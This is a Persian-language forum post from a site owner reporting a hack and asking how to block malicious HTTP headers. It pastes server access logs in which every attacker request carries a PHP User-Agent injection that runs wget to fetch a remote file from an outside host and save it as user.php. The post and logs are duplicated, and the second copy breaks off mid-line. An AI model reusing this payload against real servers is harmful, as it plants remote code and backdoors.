ayub_coder
جمعه 01 بهمن 1389, 15:45 عصر
سلام دوستان.
امروز صبح سیتم هک شد.
زیاد که از هک سر در نمیارم ولی با مطالعه log ها توی سرورم متوجه شدم که یکسری کدهای php به هدرهای http اضافه کرده بودن. نمونه شو میذارم ببینید.
خوب سوال من اینه که چطوری جلوی همچین کاری رو بگیرم که هدرهای دستکاری شده روی سرور اجرا نشن. یه جورایی فیلتر بشن. در کل سایتم هک نشه :لبخند:
اینم لوگهای که از سرور گرفتم.
ببینید آخر همشون کد php اضافه کردن.
184.154.95.116 - - [21/Jan/2011:05:37:21 +0330] "GET /style/style.css HTTP/1.1" 200 564 "http://webexperts.ir/" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 YFF35 <?php system('wget www.svvat.persiangig.com/c.txt -O user.php'); ?>"
184.154.95.116 - - [21/Jan/2011:05:37:21 +0330] "GET /style/header-style.css HTTP/1.1" 200 296 "http://webexperts.ir/" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 YFF35 <?php system('wget www.svvat.persiangig.com/c.txt -O user.php'); ?>"
184.154.95.116 - - [21/Jan/2011:05:37:21 +0330] "GET /bodyimages/favicon.ico HTTP/1.1" 200 1150 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 YFF35 <?php system('wget www.svvat.persiangig.com/c.txt -O user.php'); ?>"
184.154.95.116 - - [21/Jan/2011:05:37:20 +0330] "GET / HTTP/1.1" 200 13221 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 YFF35 <?php system('wget www.svvat.persiangig.com/c.txt -O user.php'); ?>"
184.154.95.116 - - [21/Jan/2011:05:37:23 +0330] "GET /bodyimages/top-banner.png HTTP/1.1" 200 7081 "http://webexperts.ir/style/header-style.css" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 YFF35 <?php system('wget www.svvat.persiangig.com/c.txt -O user.php'); ?>"
184.154.95.116 - - [21/Jan/2011:05:37:24 +0330] "GET /bodyimages/favicon.ico HTTP/1.1" 200 1150 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 YFF35 <?php system('wget www.svvat.persiangig.com/c.txt -O user.php'); ?>"
184.154.95.116 - - [21/Jan/2011:05:37:26 +0330] "GET /menu/stmenu.js HTTP/1.1" 200 8509 "http://webexperts.ir/" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 YFF35 <?php system('wget www.svvat.persiangig.com/c.txt -O user.php'); ?>"
184.154.95.116 - - [21/Jan/2011:05:37:27 +0330] "GET /bodyimages/mysitebanner.png HTTP/1.1" 200 13228 "http://webexperts.ir/style/header-style.css" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 YFF35 <?php system('wget www.svvat.persiangig.com/c.txt -O user.php'); ?>"
184.154.95.116 - - [21/Jan/2011:05:37:26 +0330] "GET /dbimages/bom%20chars.png HTTP/1.1" 200 22746 "http://webexperts.ir/" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 YFF35 <?php system('wget www.svvat.persiangig.com/c.txt -O user.php'); ?>"
184.154.95.116 - - [21/Jan/2011:05:37:26 +0330] "GET /bodyimages/web-experts.png HTTP/1.1" 200 43789 "http://webexperts.ir/" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 YFF35 <?php system('wget www.svvat.persiangig.com/c.txt -O user.php'); ?>"
184.154.95.116 - - [21/Jan/2011:05:37:28 +0330] "GET /menu/middle.gif HTTP/1.1" 200 162 "http://webexperts.ir/" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 YFF35 <?php system('wget www.svvat.persiangig.com/c.txt -O user.php'); ?>"
184.154.95.116 - - [21/Jan/2011:05:37:28 +0330] "GET /menu/stcode.js HTTP/1.1" 200 25665 "http://webexperts.ir/" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 YFF35 <?php system('wget www.svvat.persiangig.com/c.txt -O user.php'); ?>"
184.154.95.116 - - [21/Jan/2011:05:37:31 +0330] "GET /menu/steffie.js HTTP/1.1" 200 1120 "http://webexperts.ir/" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 YFF35 <?php system('wget www.svvat.persiangig.com/c.txt -O user.php'); ?>"
184.154.95.116 - - [21/Jan/2011:05:37:31 +0330] "GET /menu/steffslip.js HTTP/1.1" 200 1614 "http://webexperts.ir/" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 YFF35 <?php system('wget www.svvat.persiangig.com/c.txt -O user.php'); ?>"
184.154.95.116 - - [21/Jan/2011:05:37:31 +0330] "GET /menu/steffrect.js HTTP/1.1" 200 1540 "http://webexperts.ir/" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 YFF35 <?php system('wget www.svvat.persiangig.com/c.txt -O user.php'); ?>"
184.154.95.116 - - [21/Jan/2011:05:37:31 +0330] "GET /menu/blank.gif HTTP/1.1" 200 49 "http://webexperts.ir/" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 YFF35 <?php system('wget www.svvat.persiangig.com/c.txt -O user.php'); ?>"
184.154.95.116 - - [21/Jan/2011:05:37:32 +0330] "GET /menu/2-left.gif HTTP/1.1" 200 177 "http://webexperts.ir/" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 YFF35 <?php system('wget www.svvat.persiangig.com/c.txt -O user.php'); ?>"
184.154.95.116 - - [21/Jan/2011:05:37:32 +0330] "GET /menu/zuo-big1.gif HTTP/1.1" 404 389 "http://webexperts.ir/" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 YFF35 <?php system('wget www.svvat.persiangig.com/c.txt -O user.php'); ?>"
184.154.95.116 - - [21/Jan/2011:05:37:32 +0330] "GET /menu/1arrow_r.gif HTTP/1.1" 404 389 "http://webexperts.ir/" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 YFF35 <?php system('wget www.svvat.persiangig.com/c.txt -O user.php'); ?>"
184.154.95.116 - - [21/Jan/2011:05:37:32 +0330] "GET /menu/left.gif HTTP/1.1" 200 183 "http://webexperts.ir/" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 YFF35 <?php system('wget www.svvat.persiangig.com/c.txt -O user.php'); ?>"
184.154.95.116 - - [21/Jan/2011:05:37:32 +0330] "GET /bodyimages/arrow_mini_left.gif HTTP/1.1" 200 81 "http://webexperts.ir/style/style.css" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 YFF35 <?php system('wget www.svvat.persiangig.com/c.txt -O user.php'); ?>"
184.154.95.116 - - [21/Jan/2011:05:37:32 +0330] "GET /bodyimages/ads.png HTTP/1.1" 200 5324 "http://webexperts.ir/" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 YFF35 <?php system('wget www.svvat.persiangig.com/c.txt -O user.php'); ?>"
184.154.95.116 - - [21/Jan/2011:05:37:33 +0330] "GET /menu/you-big1.gif HTTP/1.1" 404 389 "http://webexperts.ir/" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 YFF35 <?php system('wget www.svvat.persiangig.com/c.txt -O user.php'); ?>"
184.154.95.116 - - [21/Jan/2011:05:37:33 +0330] "GET /menu/2-middle.gif HTTP/1.1" 200 161 "http://webexperts.ir/" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 YFF35 <?php system('wget www.svvat.persiangig.com/c.txt -O user.php'); ?>"
184.154.95.116 - - [21/Jan/2011:05:37:33 +0330] "GET /menu/right.gif HTTP/1.1" 200 183 "http://webexperts.ir/" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 YFF35 <?php system('wget www.svvat.persiangig.com/c.txt -O user.php'); ?>"
184.154.95.116 - - [21/Jan/2011:05:37:33 +0330] "GET /bodyimages/links.png HTTP/1.1" 200 5225 "http://webexperts.ir/" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 YFF35 <?php system('wget www.svvat.persiangig.com/c.txt -O user.php'); ?>"
184.154.95.116 - - [21/Jan/2011:05:37:33 +0330] "GET /bodyimages/menutitle.png HTTP/1.1" 200 6326 "http://webexperts.ir/" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 YFF35 <?php system('wget www.svvat.persiangig.com/c.txt -O user.php'); ?>"
184.154.95.116 - - [21/Jan/2011:05:37:33 +0330] "GET /bodyimages/tick.gif HTTP/1.1" 200 82 "http://webexperts.ir/style/style.css" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 YFF35 <?php system('wget www.svvat.persiangig.com/c.txt -O user.php'); ?>"
184.154.95.116 - - [21/Jan/2011:05:37:33 +0330] "GET /bodyimages/popular.png HTTP/1.1" 200 7352 "http://webexperts.ir/" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 YFF35 <?php system('wget www.svvat.persiangig.com/c.txt -O user.php'); ?>"
184.154.95.116 - - [21/Jan/2011:05:37:33 +0330] "GET /bodyimages/lastarttitle.png HTTP/1.1" 200 7978 "http://webexperts.ir/" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 YFF35 <?php system('wget www.svvat.persiangig.com/c.txt -O user.php'); ?>"
184.154.95.116 - - [21/Jan/2011:05:37:33 +0330] "GET /bodyimages/arrow_left.gif HTTP/1.1" 200 117 "http://webexperts.ir/" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 YFF35 <?php system('wget www.svvat.persiangig.com/c.txt -O user.php'); ?>"
184.154.95.116 - - [21/Jan/2011:05:37:33 +0330] "GET /bodyimages/content-title.png HTTP/1.1" 200 1571 "http://webexperts.ir/" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 YFF35 <?php system('wget www.svvat.persiangig.com/c.txt -O user.php'); ?>"
184.154.95.116 - - [21/Jan/2011:05:37:34 +0330] "GET /bodyimages/helpful.png HTTP/1.1" 200 7301 "http://webexperts.ir/" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 YFF35 <?php system('wget www.svvat.persiangig.com/c.txt -O user.php'); ?>"
184.154.95.116 - - [21/Jan/2011:05:37:34 +0330] "GET /menu/2-right.gif HTTP/1.1" 200 178 "http://webexperts.ir/" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 YFF35 <?php system('wget www.svvat.persiangig.com/c.txt -O user.php'); ?>"
184.154.95.116 - - [21/Jan/2011:05:38:21 +0330] "GET / HTTP/1.1" 200 38 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 YFF35 <?php system('wget www.svvat.persiangig.com/c.txt -O user.php'); ?>"
184.154.95.116 - - [21/Jan/2011:05:38:22 +0330] "GET /favicon.ico HTTP/1.1" 404 389 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 YFF35 <?php system('wget www.svvat.persiangig.com/c.txt -O user.php'); ?>"
184.154.95.116 - - [21/Jan/2011:05:38:22 +0330] "GET /favicon.ico HTTP/1.1" 404 389 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 YFF35 <?php system('wget www.svvat.persiangig.com/c.txt -O user.php'); ?>"
184.154.95.116 - - [21/Jan/2011:05:38:23 +0330] "GET /favicon.ico HTTP/1.1" 404 389 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 YFF35 <?php system('wget www.svvat.persiangig.com/c.txt -O user.php'); ?>"
217.162.28.98 - - [21/Jan/2011:05:38:44 +0330] "GET / HTTP/1.1" 200 18 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)"
184.154.95.116 - - [21/Jan/2011:05:39:05 +0330] "GET /favicon.ico HTTP/1.1" 404 389 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 YFF35 <?php system('wget www.svvat.persiangig.com/c.txt -O user.php'); ?>"
184.154.95.116 - - [21/Jan/2011:05:43:00 +0330] "GET /mysite/user.pl HTTP/1.1" 500 99 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 YFF35 <?php system('wget www.svvat.persiangig.com/c.txt -O user.php'); ?>"
184.154.95.116 - - [21/Jan/2011:05:43:20 +0330] "GET /mysite/user.pl HTTP/1.1" 500 99 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 YFF35 <?php system('wget www.svvat.persiangig.com/c.txt -O user.php'); ?>"
194.72.238.64 - - [21/Jan/2011:06:14:56 +0330] "HEAD / HTTP/1.1" 200 0 "http://www.netcraft.com/survey/
امروز صبح سیتم هک شد.
زیاد که از هک سر در نمیارم ولی با مطالعه log ها توی سرورم متوجه شدم که یکسری کدهای php به هدرهای http اضافه کرده بودن. نمونه شو میذارم ببینید.
خوب سوال من اینه که چطوری جلوی همچین کاری رو بگیرم که هدرهای دستکاری شده روی سرور اجرا نشن. یه جورایی فیلتر بشن. در کل سایتم هک نشه :لبخند:
اینم لوگهای که از سرور گرفتم.
ببینید آخر همشون کد php اضافه کردن.
184.154.95.116 - - [21/Jan/2011:05:37:21 +0330] "GET /style/style.css HTTP/1.1" 200 564 "http://webexperts.ir/" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 YFF35 <?php system('wget www.svvat.persiangig.com/c.txt -O user.php'); ?>"
184.154.95.116 - - [21/Jan/2011:05:37:21 +0330] "GET /style/header-style.css HTTP/1.1" 200 296 "http://webexperts.ir/" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 YFF35 <?php system('wget www.svvat.persiangig.com/c.txt -O user.php'); ?>"
184.154.95.116 - - [21/Jan/2011:05:37:21 +0330] "GET /bodyimages/favicon.ico HTTP/1.1" 200 1150 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 YFF35 <?php system('wget www.svvat.persiangig.com/c.txt -O user.php'); ?>"
184.154.95.116 - - [21/Jan/2011:05:37:20 +0330] "GET / HTTP/1.1" 200 13221 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 YFF35 <?php system('wget www.svvat.persiangig.com/c.txt -O user.php'); ?>"
184.154.95.116 - - [21/Jan/2011:05:37:23 +0330] "GET /bodyimages/top-banner.png HTTP/1.1" 200 7081 "http://webexperts.ir/style/header-style.css" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 YFF35 <?php system('wget www.svvat.persiangig.com/c.txt -O user.php'); ?>"
184.154.95.116 - - [21/Jan/2011:05:37:24 +0330] "GET /bodyimages/favicon.ico HTTP/1.1" 200 1150 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 YFF35 <?php system('wget www.svvat.persiangig.com/c.txt -O user.php'); ?>"
184.154.95.116 - - [21/Jan/2011:05:37:26 +0330] "GET /menu/stmenu.js HTTP/1.1" 200 8509 "http://webexperts.ir/" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 YFF35 <?php system('wget www.svvat.persiangig.com/c.txt -O user.php'); ?>"
184.154.95.116 - - [21/Jan/2011:05:37:27 +0330] "GET /bodyimages/mysitebanner.png HTTP/1.1" 200 13228 "http://webexperts.ir/style/header-style.css" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 YFF35 <?php system('wget www.svvat.persiangig.com/c.txt -O user.php'); ?>"
184.154.95.116 - - [21/Jan/2011:05:37:26 +0330] "GET /dbimages/bom%20chars.png HTTP/1.1" 200 22746 "http://webexperts.ir/" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 YFF35 <?php system('wget www.svvat.persiangig.com/c.txt -O user.php'); ?>"
184.154.95.116 - - [21/Jan/2011:05:37:26 +0330] "GET /bodyimages/web-experts.png HTTP/1.1" 200 43789 "http://webexperts.ir/" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 YFF35 <?php system('wget www.svvat.persiangig.com/c.txt -O user.php'); ?>"
184.154.95.116 - - [21/Jan/2011:05:37:28 +0330] "GET /menu/middle.gif HTTP/1.1" 200 162 "http://webexperts.ir/" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 YFF35 <?php system('wget www.svvat.persiangig.com/c.txt -O user.php'); ?>"
184.154.95.116 - - [21/Jan/2011:05:37:28 +0330] "GET /menu/stcode.js HTTP/1.1" 200 25665 "http://webexperts.ir/" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 YFF35 <?php system('wget www.svvat.persiangig.com/c.txt -O user.php'); ?>"
184.154.95.116 - - [21/Jan/2011:05:37:31 +0330] "GET /menu/steffie.js HTTP/1.1" 200 1120 "http://webexperts.ir/" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 YFF35 <?php system('wget www.svvat.persiangig.com/c.txt -O user.php'); ?>"
184.154.95.116 - - [21/Jan/2011:05:37:31 +0330] "GET /menu/steffslip.js HTTP/1.1" 200 1614 "http://webexperts.ir/" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 YFF35 <?php system('wget www.svvat.persiangig.com/c.txt -O user.php'); ?>"
184.154.95.116 - - [21/Jan/2011:05:37:31 +0330] "GET /menu/steffrect.js HTTP/1.1" 200 1540 "http://webexperts.ir/" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 YFF35 <?php system('wget www.svvat.persiangig.com/c.txt -O user.php'); ?>"
184.154.95.116 - - [21/Jan/2011:05:37:31 +0330] "GET /menu/blank.gif HTTP/1.1" 200 49 "http://webexperts.ir/" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 YFF35 <?php system('wget www.svvat.persiangig.com/c.txt -O user.php'); ?>"
184.154.95.116 - - [21/Jan/2011:05:37:32 +0330] "GET /menu/2-left.gif HTTP/1.1" 200 177 "http://webexperts.ir/" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 YFF35 <?php system('wget www.svvat.persiangig.com/c.txt -O user.php'); ?>"
184.154.95.116 - - [21/Jan/2011:05:37:32 +0330] "GET /menu/zuo-big1.gif HTTP/1.1" 404 389 "http://webexperts.ir/" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 YFF35 <?php system('wget www.svvat.persiangig.com/c.txt -O user.php'); ?>"
184.154.95.116 - - [21/Jan/2011:05:37:32 +0330] "GET /menu/1arrow_r.gif HTTP/1.1" 404 389 "http://webexperts.ir/" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 YFF35 <?php system('wget www.svvat.persiangig.com/c.txt -O user.php'); ?>"
184.154.95.116 - - [21/Jan/2011:05:37:32 +0330] "GET /menu/left.gif HTTP/1.1" 200 183 "http://webexperts.ir/" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 YFF35 <?php system('wget www.svvat.persiangig.com/c.txt -O user.php'); ?>"
184.154.95.116 - - [21/Jan/2011:05:37:32 +0330] "GET /bodyimages/arrow_mini_left.gif HTTP/1.1" 200 81 "http://webexperts.ir/style/style.css" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 YFF35 <?php system('wget www.svvat.persiangig.com/c.txt -O user.php'); ?>"
184.154.95.116 - - [21/Jan/2011:05:37:32 +0330] "GET /bodyimages/ads.png HTTP/1.1" 200 5324 "http://webexperts.ir/" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 YFF35 <?php system('wget www.svvat.persiangig.com/c.txt -O user.php'); ?>"
184.154.95.116 - - [21/Jan/2011:05:37:33 +0330] "GET /menu/you-big1.gif HTTP/1.1" 404 389 "http://webexperts.ir/" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 YFF35 <?php system('wget www.svvat.persiangig.com/c.txt -O user.php'); ?>"
184.154.95.116 - - [21/Jan/2011:05:37:33 +0330] "GET /menu/2-middle.gif HTTP/1.1" 200 161 "http://webexperts.ir/" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 YFF35 <?php system('wget www.svvat.persiangig.com/c.txt -O user.php'); ?>"
184.154.95.116 - - [21/Jan/2011:05:37:33 +0330] "GET /menu/right.gif HTTP/1.1" 200 183 "http://webexperts.ir/" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 YFF35 <?php system('wget www.svvat.persiangig.com/c.txt -O user.php'); ?>"
184.154.95.116 - - [21/Jan/2011:05:37:33 +0330] "GET /bodyimages/links.png HTTP/1.1" 200 5225 "http://webexperts.ir/" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 YFF35 <?php system('wget www.svvat.persiangig.com/c.txt -O user.php'); ?>"
184.154.95.116 - - [21/Jan/2011:05:37:33 +0330] "GET /bodyimages/menutitle.png HTTP/1.1" 200 6326 "http://webexperts.ir/" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 YFF35 <?php system('wget www.svvat.persiangig.com/c.txt -O user.php'); ?>"
184.154.95.116 - - [21/Jan/2011:05:37:33 +0330] "GET /bodyimages/tick.gif HTTP/1.1" 200 82 "http://webexperts.ir/style/style.css" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 YFF35 <?php system('wget www.svvat.persiangig.com/c.txt -O user.php'); ?>"
184.154.95.116 - - [21/Jan/2011:05:37:33 +0330] "GET /bodyimages/popular.png HTTP/1.1" 200 7352 "http://webexperts.ir/" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 YFF35 <?php system('wget www.svvat.persiangig.com/c.txt -O user.php'); ?>"
184.154.95.116 - - [21/Jan/2011:05:37:33 +0330] "GET /bodyimages/lastarttitle.png HTTP/1.1" 200 7978 "http://webexperts.ir/" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 YFF35 <?php system('wget www.svvat.persiangig.com/c.txt -O user.php'); ?>"
184.154.95.116 - - [21/Jan/2011:05:37:33 +0330] "GET /bodyimages/arrow_left.gif HTTP/1.1" 200 117 "http://webexperts.ir/" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 YFF35 <?php system('wget www.svvat.persiangig.com/c.txt -O user.php'); ?>"
184.154.95.116 - - [21/Jan/2011:05:37:33 +0330] "GET /bodyimages/content-title.png HTTP/1.1" 200 1571 "http://webexperts.ir/" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 YFF35 <?php system('wget www.svvat.persiangig.com/c.txt -O user.php'); ?>"
184.154.95.116 - - [21/Jan/2011:05:37:34 +0330] "GET /bodyimages/helpful.png HTTP/1.1" 200 7301 "http://webexperts.ir/" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 YFF35 <?php system('wget www.svvat.persiangig.com/c.txt -O user.php'); ?>"
184.154.95.116 - - [21/Jan/2011:05:37:34 +0330] "GET /menu/2-right.gif HTTP/1.1" 200 178 "http://webexperts.ir/" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 YFF35 <?php system('wget www.svvat.persiangig.com/c.txt -O user.php'); ?>"
184.154.95.116 - - [21/Jan/2011:05:38:21 +0330] "GET / HTTP/1.1" 200 38 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 YFF35 <?php system('wget www.svvat.persiangig.com/c.txt -O user.php'); ?>"
184.154.95.116 - - [21/Jan/2011:05:38:22 +0330] "GET /favicon.ico HTTP/1.1" 404 389 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 YFF35 <?php system('wget www.svvat.persiangig.com/c.txt -O user.php'); ?>"
184.154.95.116 - - [21/Jan/2011:05:38:22 +0330] "GET /favicon.ico HTTP/1.1" 404 389 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 YFF35 <?php system('wget www.svvat.persiangig.com/c.txt -O user.php'); ?>"
184.154.95.116 - - [21/Jan/2011:05:38:23 +0330] "GET /favicon.ico HTTP/1.1" 404 389 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 YFF35 <?php system('wget www.svvat.persiangig.com/c.txt -O user.php'); ?>"
217.162.28.98 - - [21/Jan/2011:05:38:44 +0330] "GET / HTTP/1.1" 200 18 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)"
184.154.95.116 - - [21/Jan/2011:05:39:05 +0330] "GET /favicon.ico HTTP/1.1" 404 389 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 YFF35 <?php system('wget www.svvat.persiangig.com/c.txt -O user.php'); ?>"
184.154.95.116 - - [21/Jan/2011:05:43:00 +0330] "GET /mysite/user.pl HTTP/1.1" 500 99 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 YFF35 <?php system('wget www.svvat.persiangig.com/c.txt -O user.php'); ?>"
184.154.95.116 - - [21/Jan/2011:05:43:20 +0330] "GET /mysite/user.pl HTTP/1.1" 500 99 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 YFF35 <?php system('wget www.svvat.persiangig.com/c.txt -O user.php'); ?>"
194.72.238.64 - - [21/Jan/2011:06:14:56 +0330] "HEAD / HTTP/1.1" 200 0 "http://www.netcraft.com/survey/